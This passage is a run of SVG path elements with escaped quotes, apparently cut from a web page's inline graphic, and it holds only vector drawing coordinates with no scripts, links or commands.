d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n        <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n        <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n        <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n        <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n        <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n        <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n        <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n        <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n        <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n        <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n        <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n        <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n        <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n        <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n        <path 